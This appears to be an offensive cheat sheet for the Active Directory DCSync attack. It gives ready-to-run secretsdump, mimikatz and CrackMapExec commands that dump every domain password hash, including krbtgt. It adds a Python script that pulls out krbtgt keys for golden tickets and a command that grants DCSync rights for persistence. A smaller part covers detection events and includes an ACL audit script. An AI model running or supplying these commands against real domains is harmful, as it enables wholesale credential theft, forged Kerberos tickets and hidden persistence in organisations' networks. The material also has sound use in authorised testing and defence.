Overview

DCSync abuses the directory replication service (MS-DRSR over the DRSUAPI RPC interface) by asking a Domain Controller to replicate account objects, password hashes included, the way a partner DC would. All the caller needs is the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain naming context; nothing is executed on the DC and NTDS.dit is never read from disk, so the only trace is a replication request from an account that is not a DC (Windows records it as Event ID 4662 carrying the replication property GUIDs when Directory Service Access auditing is enabled).

Requirements

  • Membership in Domain Admins, Enterprise Admins or Administrators (these hold the rights by default, as do Domain Controller computer accounts), or
  • Any principal granted both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object ("DCSync rights"); Get-Changes alone, or Get-Changes-In-Filtered-Set, is not enough
  • Network reach to the target DC's RPC endpoint mapper (TCP/135) and the dynamic port it hands out for the DRSUAPI interface

Impacket — secretsdump

Single User

impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-user administrator
impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-user krbtgt

All Users

impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc

With Hash (PtH)

impacket-secretsdump DOMAIN/admin@DC_IP -hashes :NTLM_HASH -just-dc    # -hashes takes LMHASH:NTHASH; leave the LM half empty

NTLM Hashes Only

-just-dc already skips the local SAM and LSA secrets; -just-dc-ntlm additionally drops the Kerberos keys (AES/DES) and any reversibly-encrypted cleartext passwords that -just-dc would return. Use plain -just-dc when you want the krbtgt AES keys for AES-based golden tickets.

impacket-secretsdump DOMAIN/admin:password@DC_IP -just-dc-ntlm

Mimikatz

Run from a context that already holds the rights (a DCSync-capable user, or a token obtained with sekurlsa::pth from that user's hash); /dc:DC_FQDN targets a specific DC instead of the one mimikatz locates itself.

mimikatz # lsadump::dcsync /domain:domain.local /user:administrator
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt
mimikatz # lsadump::dcsync /domain:domain.local /all /csv

CrackMapExec

--ntds wraps impacket's secretsdump and defaults to the DRSUAPI (DCSync) method, so it needs the same replication rights and prints the same domain\user:rid:lmhash:nthash::: lines.

crackmapexec smb DC_IP -u admin -p password --ntds
crackmapexec smb DC_IP -u admin -H HASH --ntds
crackmapexec smb DC_IP -u admin -p password --ntds --users    # Users only
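What to do with the dump once you have it: the following Python post-processor is an added example (it is not part of this page, of Impacket or of CrackMapExec). It parses the pwdump-style `domain\user:rid:lmhash:nthash:::` lines and the `user:etype:key` Kerberos lines that the Impacket and CME commands above print, pulls out the krbtgt material a golden ticket needs, and triages the rest for password reuse, blank passwords and stored LM hashes. The sample output embedded in it is constructed and every hash in it is made up.

```python
"""Post-process DCSync output from impacket-secretsdump / CrackMapExec --ntds.
Added example: SAMPLE is constructed, all hashes are fake."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash stored for the account
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has a blank password

# Constructed sample in the shape of `secretsdump ... -just-dc` output (status lines + records).
SAMPLE = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
domain.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
domain.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
domain.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
domain.local\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
domain.local\\legacy:1106:1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f:9f8e7d6c5b4a39281706f5e4d3c2b1a0:::
domain.local\\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
domain.local\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:deadbeefdeadbeefdeadbeefdeadbeef:::
[*] Kerberos keys grabbed
domain.local\\krbtgt:aes256-cts-hmac-sha1-96:00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
domain.local\\krbtgt:aes128-cts-hmac-sha1-96:00112233445566778899aabbccddeeff
domain.local\\Administrator:aes256-cts-hmac-sha1-96:ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100
[*] Cleaning up...
"""

NTLM_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
KEY_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<etype>[a-z0-9_-]+):(?P<key>[0-9a-f]+)$")


def parse_secretsdump(text):
    """Return (ntlm, keys): ntlm maps user -> {rid, lm, nt}; keys maps user -> {etype: hexkey}.
    Status lines ([*], [-], [!]) are skipped. Records are keyed by sAMAccountName only,
    so split a multi-domain dump per domain before parsing."""
    ntlm, keys = {}, defaultdict(dict)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("["):
            continue
        m = NTLM_LINE.match(line)
        if m:
            ntlm[m["user"]] = {"rid": int(m["rid"]), "lm": m["lm"], "nt": m["nt"]}
            continue
        m = KEY_LINE.match(line)
        if m:
            keys[m["user"]][m["etype"]] = m["key"]
    return ntlm, dict(keys)


def krbtgt_material(ntlm, keys):
    """Everything a golden ticket needs: krbtgt NT hash (RC4) plus its AES keys."""
    out = {"nt": ntlm["krbtgt"]["nt"]}
    out.update(keys.get("krbtgt", {}))
    return out


def triage(ntlm):
    """Findings worth reporting from a full -just-dc dump."""
    by_nt = defaultdict(list)
    for user, rec in ntlm.items():
        if user.endswith("$") or "_history" in user:
            continue  # machine accounts and password-history rows are not reuse findings
        by_nt[rec["nt"]].append(user)
    return {
        # identical NT hash on several accounts == identical password
        "shared_nt": {h: sorted(u) for h, u in by_nt.items() if len(u) > 1},
        "empty_nt": sorted(u for u, r in ntlm.items() if r["nt"] == EMPTY_NT),
        # a non-empty LM hash means the domain still stores LM hashes for that account
        "lm_stored": sorted(u for u, r in ntlm.items() if r["lm"] != EMPTY_LM),
    }


if __name__ == "__main__":
    ntlm, keys = parse_secretsdump(SAMPLE)
    print("krbtgt:", krbtgt_material(ntlm, keys))
    for name, finding in triage(ntlm).items():
        print(f"{name}: {finding}")
```

Pipe a real dump through it with `secretsdump ... -just-dc -outputfile ntds` and read the `.ntds` / `.ntds.kerberos` files it writes; on the constructed sample it reports that Administrator and svc_backup share a password, that Guest has a blank one and that the legacy account still has an LM hash stored.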

Check DCSync Rights

PowerView

Get-ObjectAcl -DistinguishedName "DC=domain,DC=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication')}

'replication' also matches DS-Replication-Get-Changes-In-Filtered-Set, which on its own does not permit DCSync: a principal needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (or GenericAll on the domain object). The ACL only names principals directly, so expand group membership to see who actually inherits the rights.

Manual

Look for Allow ACEs on the domain object (DC=domain,DC=local) that grant a principal both of these extended rights; one without the other is not enough:
  • DS-Replication-Get-Changes (GUID: 1131f6aa-…)
  • DS-Replication-Get-Changes-All (GUID: 1131f6ad-…)
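To turn the check above into a repeatable audit, the following Python script is an added example (not from this page or from PowerView). It reads an ACE export of the kind the PowerView query produces once saved as CSV (principal, resolved right name, rights mask, ACE type), applies the rule that a principal needs both replication rights, or GenericAll, with no Deny ACE taking one away, and reports which capable principals are not in the list expected for a default domain. The CSV sample and the column names are constructed, and DEFAULT_PRINCIPALS is an assumption to adjust per forest.

```python
"""Audit the domain object's ACL for DCSync-capable principals.
Added example: SAMPLE_ACL is a constructed export, not real PowerView output."""
import csv
import io
from collections import defaultdict

GET_CHANGES = "DS-Replication-Get-Changes"
GET_CHANGES_ALL = "DS-Replication-Get-Changes-All"

# Assumption: principals that hold both rights in a default domain; adjust to your forest.
DEFAULT_PRINCIPALS = {
    "BUILTIN\\Administrators",
    "DOMAIN\\Domain Controllers",
    "DOMAIN\\Enterprise Admins",
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
}

# Constructed sample: IdentityReference, ObjectType (GUID already resolved to a name),
# ActiveDirectoryRights, AceType. Matches the shape of a -ResolveGUIDs export.
SAMPLE_ACL = """\
IdentityReference,ObjectType,ActiveDirectoryRights,AceType
BUILTIN\\Administrators,DS-Replication-Get-Changes,ExtendedRight,AccessAllowedObject
BUILTIN\\Administrators,DS-Replication-Get-Changes-All,ExtendedRight,AccessAllowedObject
DOMAIN\\Domain Controllers,DS-Replication-Get-Changes,ExtendedRight,AccessAllowedObject
DOMAIN\\Domain Controllers,DS-Replication-Get-Changes-All,ExtendedRight,AccessAllowedObject
DOMAIN\\Enterprise Admins,DS-Replication-Get-Changes,ExtendedRight,AccessAllowedObject
DOMAIN\\Enterprise Admins,DS-Replication-Get-Changes-All,ExtendedRight,AccessAllowedObject
DOMAIN\\svc_backup,DS-Replication-Get-Changes,ExtendedRight,AccessAllowedObject
DOMAIN\\svc_backup,DS-Replication-Get-Changes-All,ExtendedRight,AccessAllowedObject
DOMAIN\\helpdesk,DS-Replication-Get-Changes,ExtendedRight,AccessAllowedObject
DOMAIN\\helpdesk,DS-Replication-Get-Changes-In-Filtered-Set,ExtendedRight,AccessAllowedObject
DOMAIN\\legacy_app_admins,All,GenericAll,AccessAllowed
DOMAIN\\contractor,DS-Replication-Get-Changes,ExtendedRight,AccessAllowedObject
DOMAIN\\contractor,DS-Replication-Get-Changes-All,ExtendedRight,AccessAllowedObject
DOMAIN\\contractor,DS-Replication-Get-Changes-All,ExtendedRight,AccessDeniedObject
"""


def parse_aces(text):
    """One dict per ACE, keyed by the CSV header."""
    return list(csv.DictReader(io.StringIO(text)))


def dcsync_capable(aces, expected=DEFAULT_PRINCIPALS):
    """Map principal -> {'via': how, 'expected': bool} for every principal that ends up
    with BOTH replication rights after Deny ACEs are subtracted."""
    allowed, denied = defaultdict(set), defaultdict(set)
    for ace in aces:
        who, right = ace["IdentityReference"], ace["ObjectType"]
        mask, kind = ace["ActiveDirectoryRights"], ace["AceType"]
        bucket = allowed if kind.startswith("AccessAllowed") else denied
        if "GenericAll" in mask:
            # GenericAll on the domain head carries every extended right, both replication rights included
            bucket[who].update({GET_CHANGES, GET_CHANGES_ALL, "GenericAll"})
        elif "ExtendedRight" in mask:
            bucket[who].add(right)
    result = {}
    for who, rights in allowed.items():
        # Simplification: an explicit Deny for a right beats any Allow for the same right
        effective = rights - denied[who]
        if {GET_CHANGES, GET_CHANGES_ALL} <= effective:
            result[who] = {
                "via": "GenericAll" if "GenericAll" in effective else "both extended rights",
                "expected": who in expected,
            }
    return result


def unexpected(aces):
    """Principals that can DCSync but are not on the expected list: the findings."""
    return sorted(p for p, info in dcsync_capable(aces).items() if not info["expected"])


if __name__ == "__main__":
    for who, info in dcsync_capable(parse_aces(SAMPLE_ACL)).items():
        print(f"{who:45} via {info['via']:22} expected={info['expected']}")
    print("unexpected:", unexpected(parse_aces(SAMPLE_ACL)))
```

On the sample this flags svc_backup (both extended rights granted directly) and legacy_app_admins (GenericAll), while helpdesk (Get-Changes plus Get-Changes-In-Filtered-Set only) and contractor (Get-Changes-All explicitly denied) are correctly left out. Two things the ACL alone cannot tell you: members of a capable group inherit the capability, so resolve membership for each hit, and WriteDacl or WriteOwner on the domain object lets a principal grant itself the rights at will, which is the same finding one step removed.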

Grant DCSync Rights (Persistence)

Writing the two ACEs needs WriteDacl (or ownership / GenericAll) on the domain object. The grant is itself a visible artefact: it shows up in the ACL check above and, when Directory Service Changes auditing is enabled, as an Event ID 5136 on the DC.

Add-ObjectAcl -TargetDistinguishedName "DC=domain,DC=local" -PrincipalSamAccountName targetuser -Rights DCSync

Quick Reference

Task          Command
Single user   secretsdump DOMAIN/admin:pass@DC -just-dc-user krbtgt
All hashes    secretsdump DOMAIN/admin:pass@DC -just-dc
Mimikatz      lsadump::dcsync /domain:dom.local /user:admin
CME           crackmapexec smb DC -u admin -p pass --ntds